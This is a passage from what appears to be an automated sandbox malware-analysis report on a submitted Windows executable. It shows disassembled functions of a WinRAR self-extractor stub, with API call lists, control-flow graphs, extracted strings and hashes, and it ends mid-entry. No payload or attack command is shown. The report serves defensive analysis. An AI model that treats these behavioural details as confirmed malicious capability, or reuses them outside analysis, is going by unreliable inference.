                                                                                                  • Opcode Fuzzy Hash: 5770f1457157d10a12dc93733834fc3935b4f4b5196ccbe622ee9600f3634056
                                                                                                  • Instruction Fuzzy Hash: DD31C275A49306AFC7109F61EC88D6B7BBCEF85761B004519F805C2261EB31DE84EEA1
                                                                                                  Function 0090A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1029 90a69b-90a6bf call 91ec50 1032 90a6c1-90a6ce FindFirstFileW 1029->1032 1033 90a727-90a730 FindNextFileW 1029->1033 1034 90a742-90a7ff call 910602 call 90c310 call 9115da * 3 1032->1034 1036 90a6d0-90a6e2 call 90bb03 1032->1036 1033->1034 1035 90a732-90a740 GetLastError 1033->1035 1040 90a804-90a811 1034->1040 1037 90a719-90a722 1035->1037 1044 90a6e4-90a6fc FindFirstFileW 1036->1044 1045 90a6fe-90a707 GetLastError 1036->1045 1037->1040 1044->1034 1044->1045 1047 90a717 1045->1047 1048 90a709-90a70c 1045->1048 1047->1037 1048->1047 1049 90a70e-90a711 1048->1049 1049->1047 1051 90a713-90a715 1049->1051 1051->1037
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A6C4
                                                                                                    • Part of subcall function 0090BB03: _wcslen.LIBCMT ref: 0090BB27
                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A6F2
                                                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A6FE
                                                                                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A728
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,0090A592,000000FF,?,?), ref: 0090A734
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 42610566-0
                                                                                                  • Opcode ID: 70b49415db65ee759d86d4b6537f80750f957a2ed6dd7650406130fa253d28dc
                                                                                                  • Instruction ID: 56499426b39a628383a4d95c5af231ff484c0525e5e3a58028ea2a87713db97c
                                                                                                  • Opcode Fuzzy Hash: 70b49415db65ee759d86d4b6537f80750f957a2ed6dd7650406130fa253d28dc
                                                                                                  • Instruction Fuzzy Hash: 37414F72900619AFCB25DF68CC84AE9B7B8FB48350F148196F959D3250D7346E94DF90
                                                                                                  Function 00927DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00927DC4,00000000,0093C300,0000000C,00927F1B,00000000,00000002,00000000), ref: 00927E0F
                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00927DC4,00000000,0093C300,0000000C,00927F1B,00000000,00000002,00000000), ref: 00927E16
                                                                                                  • ExitProcess.KERNEL32 ref: 00927E28
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  • Opcode ID: 400971564aa4f00eeb234eaae5975060eba7d4ed8a44dd2908a7fe3e47c9d148
                                                                                                  • Instruction ID: 4a6e9b98f6cdfb343f1b1eec1c1a768d03602ed12d5d2392ac4fe61da0ce02aa
                                                                                                  • Opcode Fuzzy Hash: 400971564aa4f00eeb234eaae5975060eba7d4ed8a44dd2908a7fe3e47c9d148
                                                                                                  • Instruction Fuzzy Hash: 5EE04F31058154ABCF016F90ED09A497F6AEB40341B018454F8059A136CB35DE51EB90
                                                                                                  Function 0090848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: 7238da1d00c6267e0adf52f86660e28343b209fcce57cde7b50ab9f598c8f422
                                                                                                  • Instruction ID: 51bdd6cc7aaca24522a6c989bfcf1781798ec0aaea6cbf2c0c281d4e825fcf9d
                                                                                                  • Opcode Fuzzy Hash: 7238da1d00c6267e0adf52f86660e28343b209fcce57cde7b50ab9f598c8f422
                                                                                                  • Instruction Fuzzy Hash: 4D820A71A04245AEDF15DB64C895BFBBBBDAF45300F0841B9E8D99B2C3DB315A84CB60
                                                                                                  Function 0091B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 0091B7E5
                                                                                                    • Part of subcall function 00901316: GetDlgItem.USER32(00000000,00003021), ref: 0090135A
                                                                                                    • Part of subcall function 00901316: SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0091B8D1
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0091B8EF
                                                                                                  • IsDialogMessageW.USER32(?,?), ref: 0091B902
                                                                                                  • TranslateMessage.USER32(?), ref: 0091B910
                                                                                                  • DispatchMessageW.USER32(?), ref: 0091B91A
                                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0091B93D
                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0091B960
                                                                                                  • GetDlgItem.USER32(?,00000068), ref: 0091B983
                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0091B99E
                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,009335F4), ref: 0091B9B1
                                                                                                    • Part of subcall function 0091D453: _wcslen.LIBCMT ref: 0091D47D
                                                                                                  • SetFocus.USER32(00000000), ref: 0091B9B8
                                                                                                  • _swprintf.LIBCMT ref: 0091BA24
                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                    • Part of subcall function 0091D4D4: GetDlgItem.USER32(00000068,0095FCB8), ref: 0091D4E8
                                                                                                    • Part of subcall function 0091D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0091AF07,00000001,?,?,0091B7B9,0093506C,0095FCB8,0095FCB8,00001000,00000000,00000000), ref: 0091D510
                                                                                                    • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0091D51B
                                                                                                    • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,000000C2,00000000,009335F4), ref: 0091D529
                                                                                                    • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0091D53F
                                                                                                    • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0091D559
                                                                                                    • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0091D59D
                                                                                                    • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0091D5AB
                                                                                                    • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0091D5BA
                                                                                                    • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0091D5E1
                                                                                                    • Part of subcall function 0091D4D4: SendMessageW.USER32(00000000,000000C2,00000000,009343F4), ref: 0091D5F0
                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0091BA68
                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0091BA90
                                                                                                  • GetTickCount.KERNEL32 ref: 0091BAAE
                                                                                                  • _swprintf.LIBCMT ref: 0091BAC2
                                                                                                  • GetLastError.KERNEL32(?,00000011), ref: 0091BAF4
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0091BB43
                                                                                                  • _swprintf.LIBCMT ref: 0091BB7C
                                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0091BBD0
                                                                                                  • GetCommandLineW.KERNEL32 ref: 0091BBEA
                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0091BC47
                                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 0091BC6F
                                                                                                  • Sleep.KERNEL32(00000064), ref: 0091BCB9
                                                                                                  • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0091BCE2
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0091BCEB
                                                                                                  • _swprintf.LIBCMT ref: 0091BD1E
                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0091BD7D
                                                                                                  • SetDlgItemTextW.USER32(?,00000065,009335F4), ref: 0091BD94
                                                                                                  • GetDlgItem.USER32(?,00000065), ref: 0091BD9D
                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0091BDAC
                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0091BDBB
                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0091BE68
                                                                                                  • _wcslen.LIBCMT ref: 0091BEBE
                                                                                                  • _swprintf.LIBCMT ref: 0091BEE8
                                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0091BF32
                                                                                                  • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0091BF4C
                                                                                                  • GetDlgItem.USER32(?,00000068), ref: 0091BF55
                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0091BF6B
                                                                                                  • GetDlgItem.USER32(?,00000066), ref: 0091BF85
                                                                                                  • SetWindowTextW.USER32(00000000,0094A472), ref: 0091BFA7
                                                                                                  • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0091C007
                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0091C01A
                                                                                                  • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0091C0BD
                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0091C197
                                                                                                  • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0091C1D9
                                                                                                    • Part of subcall function 0091C73F: __EH_prolog.LIBCMT ref: 0091C744
                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0091C1FD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                  • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                  • API String ID: 3445078344-2238251102
                                                                                                  • Opcode ID: ec0be37e8b367f2aae119cdc1ac9ff43ec2a3afeb80166228c27c1e928ef646a
                                                                                                  • Instruction ID: adee4c5c1bc9c0429996f1c0f49749abca1f56e345e63bf461a359fe45750812
                                                                                                  • Opcode Fuzzy Hash: ec0be37e8b367f2aae119cdc1ac9ff43ec2a3afeb80166228c27c1e928ef646a
                                                                                                  • Instruction Fuzzy Hash: C242E8B1A9824CBEEB219B70DD4AFFE377D9B42700F044059F644A60E2CBB55E84DB61
                                                                                                  Function 00910863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 268 910863-910886 call 91ec50 GetModuleHandleW 271 9108e7-910b48 268->271 272 910888-91089f GetProcAddress 268->272 273 910c14-910c40 GetModuleFileNameW call 90c29a call 910602 271->273 274 910b4e-910b59 call 9275fb 271->274 275 9108a1-9108b7 272->275 276 9108b9-9108c9 GetProcAddress 272->276 291 910c42-910c4e call 90b146 273->291 274->273 286 910b5f-910b8d GetModuleFileNameW CreateFileW 274->286 275->276 279 9108e5 276->279 280 9108cb-9108e0 276->280 279->271 280->279 288 910c08-910c0f CloseHandle 286->288 289 910b8f-910b9b SetFilePointer 286->289 288->273 289->288 292 910b9d-910bb9 ReadFile 289->292 298 910c50-910c5b call 91081b 291->298 299 910c7d-910ca4 call 90c310 GetFileAttributesW 291->299 292->288 294 910bbb-910be0 292->294 296 910bfd-910c06 call 910371 294->296 296->288 304 910be2-910bfc call 91081b 296->304 298->299 309 910c5d-910c7b CompareStringW 298->309 306 910ca6-910caa 299->306 307 910cae 299->307 304->296 306->291 310 910cac 306->310 311 910cb0-910cb5 307->311 309->299 309->306 310->311 313 910cb7 311->313 314 910cec-910cee 311->314 315 910cb9-910ce0 call 90c310 GetFileAttributesW 313->315 316 910cf4-910d0b call 90c2e4 call 90b146 314->316 317 910dfb-910e05 314->317 323 910ce2-910ce6 315->323 324 910cea 315->324 327 910d73-910da6 call 904092 AllocConsole 316->327 328 910d0d-910d6e call 91081b * 2 call 90e617 call 904092 call 90e617 call 91a7e4 316->328 323->315 326 910ce8 323->326 324->314 326->314 333 910df3-910df5 ExitProcess 327->333 334 910da8-910ded GetCurrentProcessId AttachConsole call 923e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32), ref: 0091087C
                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0091088E
                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009108BF
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00910B69
                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00910B83
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00910B93
                                                                                                  • ReadFile.KERNEL32(00000000,?,00007FFE,00933C7C,00000000), ref: 00910BB1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00910C09
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00910C1E
                                                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00933C7C,?,00000000,?,00000800), ref: 00910C72
                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00933C7C,00000800,?,00000000,?,00000800), ref: 00910C9C
                                                                                                  • GetFileAttributesW.KERNEL32(?,?,00933D44,00000800), ref: 00910CD8
                                                                                                    • Part of subcall function 0091081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00910836
                                                                                                    • Part of subcall function 0091081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0090F2D8,Crypt32.dll,00000000,0090F35C,?,?,0090F33E,?,?,?), ref: 00910858
                                                                                                  • _swprintf.LIBCMT ref: 00910D4A
                                                                                                  • _swprintf.LIBCMT ref: 00910D96
                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                  • AllocConsole.KERNEL32 ref: 00910D9E
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00910DA8
                                                                                                  • AttachConsole.KERNEL32(00000000), ref: 00910DAF
                                                                                                  • _wcslen.LIBCMT ref: 00910DC4
                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00910DD5
                                                                                                  • WriteConsoleW.KERNEL32(00000000), ref: 00910DDC
                                                                                                  • Sleep.KERNEL32(00002710), ref: 00910DE7
                                                                                                  • FreeConsole.KERNEL32 ref: 00910DED
                                                                                                  • ExitProcess.KERNEL32 ref: 00910DF5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                  • API String ID: 1207345701-3298887752
                                                                                                  • Opcode ID: 7a290c9895e00cb5a3dc4df38446a56b454a0635edbc61b414c280373b1e67ae
                                                                                                  • Instruction ID: e9f412e517c5e4bfebb6cedea0df8ff0711e62ae087ac4fde7ac65dcff926f4c
                                                                                                  • Opcode Fuzzy Hash: 7a290c9895e00cb5a3dc4df38446a56b454a0635edbc61b414c280373b1e67ae
                                                                                                  • Instruction Fuzzy Hash: E6D181B1188384AFD3309F50C849BDFBAECBBC5704F51891DF59996190CBB59688CFA2
                                                                                                  Function 0091C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 347 91c73f-91c757 call 91eb78 call 91ec50 352 91d40d-91d418 347->352 353 91c75d-91c787 call 91b314 347->353 353->352 356 91c78d-91c792 353->356 357 91c793-91c7a1 356->357 358 91c7a2-91c7b7 call 91af98 357->358 361 91c7b9 358->361 362 91c7bb-91c7d0 call 911fbb 361->362 365 91c7d2-91c7d6 362->365 366 91c7dd-91c7e0 362->366 365->362 367 91c7d8 365->367 368 91c7e6 366->368 369 91d3d9-91d404 call 91b314 366->369 367->369 371 91c7ed-91c7f0 368->371 372 91ca7c-91ca7e 368->372 373 91ca5f-91ca61 368->373 374 91c9be-91c9c0 368->374 369->357 380 91d40a-91d40c 369->380 371->369 379 91c7f6-91c850 call 91a64d call 90bdf3 call 90a544 call 90a67e call 906edb 371->379 372->369 377 91ca84-91ca8b 372->377 373->369 376 91ca67-91ca77 SetWindowTextW 373->376 374->369 378 91c9c6-91c9d2 374->378 376->369 377->369 381 91ca91-91caaa 377->381 382 91c9d4-91c9e5 call 927686 378->382 383 91c9e6-91c9eb 378->383 435 91c98f-91c9a4 call 90a5d1 379->435 380->352 385 91cab2-91cac0 call 923e13 381->385 386 91caac 381->386 382->383 389 91c9f5-91ca00 call 91b48e 383->389 390 91c9ed-91c9f3 383->390 385->369 403 91cac6-91cacf 385->403 386->385 394 91ca05-91ca07 389->394 390->394 397 91ca12-91ca32 call 923e13 call 923e3e 394->397 398 91ca09-91ca10 call 923e13 394->398 423 91ca34-91ca3b 397->423 424 91ca4b-91ca4d 397->424 398->397 407 91cad1-91cad5 403->407 408 91caf8-91cafb 403->408 411 91cb01-91cb04 407->411 414 91cad7-91cadf 407->414 408->411 412 91cbe0-91cbee call 910602 408->412 416 91cb11-91cb2c 411->416 417 91cb06-91cb0b 411->417 427 91cbf0-91cc04 call 92279b 412->427 414->369 420 91cae5-91caf3 call 910602 414->420 436 91cb76-91cb7d 416->436 437 91cb2e-91cb68 416->437 417->412 417->416 420->427 431 91ca42-91ca4a call 927686 423->431 432 91ca3d-91ca3f 423->432 424->369 426 91ca53-91ca5a call 923e2e 424->426 426->369 446 91cc11-91cc62 call 910602 call 91b1be GetDlgItem SetWindowTextW SendMessageW call 923e49 427->446 447 91cc06-91cc0a 427->447 431->424 432->431 453 91c855-91c869 SetFileAttributesW 435->453 454 91c9aa-91c9b9 call 90a55a 435->454 439 91cbab-91cbce call 923e13 * 2 436->439 440 91cb7f-91cb97 call 923e13 436->440 470 91cb6a 437->470 471 91cb6c-91cb6e 437->471 439->427 475 91cbd0-91cbde call 9105da 439->475 440->439 457 91cb99-91cba6 call 9105da 440->457 481 91cc67-91cc6b 446->481 447->446 452 91cc0c-91cc0e 447->452 452->446 458 91c90f-91c91f GetFileAttributesW 453->458 459 91c86f-91c8a2 call 90b991 call 90b690 call 923e13 453->459 454->369 457->439 458->435 468 91c921-91c930 DeleteFileW 458->468 491 91c8b5-91c8c3 call 90bdb4 459->491 492 91c8a4-91c8b3 call 923e13 459->492 468->435 474 91c932-91c935 468->474 470->471 471->436 478 91c939-91c965 call 904092 GetFileAttributesW 474->478 475->427 488 91c937-91c938 478->488 489 91c967-91c97d MoveFileW 478->489 481->369 485 91cc71-91cc85 SendMessageW 481->485 485->369 488->478 489->435 490 91c97f-91c989 MoveFileExW 489->490 490->435 491->454 497 91c8c9-91c908 call 923e13 call 91fff0 491->497 492->491 492->497 497->458
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 0091C744
                                                                                                    • Part of subcall function 0091B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0091B3FB
                                                                                                  • _wcslen.LIBCMT ref: 0091CA0A
                                                                                                  • _wcslen.LIBCMT ref: 0091CA13
                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0091CA71
                                                                                                  • _wcslen.LIBCMT ref: 0091CAB3
                                                                                                  • _wcsrchr.LIBVCRUNTIME ref: 0091CBFB
                                                                                                  • GetDlgItem.USER32(?,00000066), ref: 0091CC36
                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0091CC46
                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,0094A472), ref: 0091CC54
                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0091CC7F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                  • API String ID: 2804936435-312220925
                                                                                                  • Opcode ID: c16ebd39446c65ad34f2bef9c743f9620c74a579df58b165928008cf75ecf1dc
                                                                                                  • Instruction ID: eb0627ae6c6f36bcf87ffb9b00a35072b5e97b5755da4d068186e1d062bf60ad
                                                                                                  • Opcode Fuzzy Hash: c16ebd39446c65ad34f2bef9c743f9620c74a579df58b165928008cf75ecf1dc
                                                                                                  • Instruction Fuzzy Hash: 0BE164B2A4421DAADF25DBA0DD85EEE73BCAB44350F4084A5F649E3050EB749EC58F60
                                                                                                  Function 0090DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 0090DA70
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0090DAAC
                                                                                                    • Part of subcall function 0090C29A: _wcslen.LIBCMT ref: 0090C2A2
                                                                                                    • Part of subcall function 009105DA: _wcslen.LIBCMT ref: 009105E0
                                                                                                    • Part of subcall function 00911B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0090BAE9,00000000,?,?,?,00010464), ref: 00911BA0
                                                                                                  • _wcslen.LIBCMT ref: 0090DDE9
                                                                                                  • __fprintf_l.LIBCMT ref: 0090DF1C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
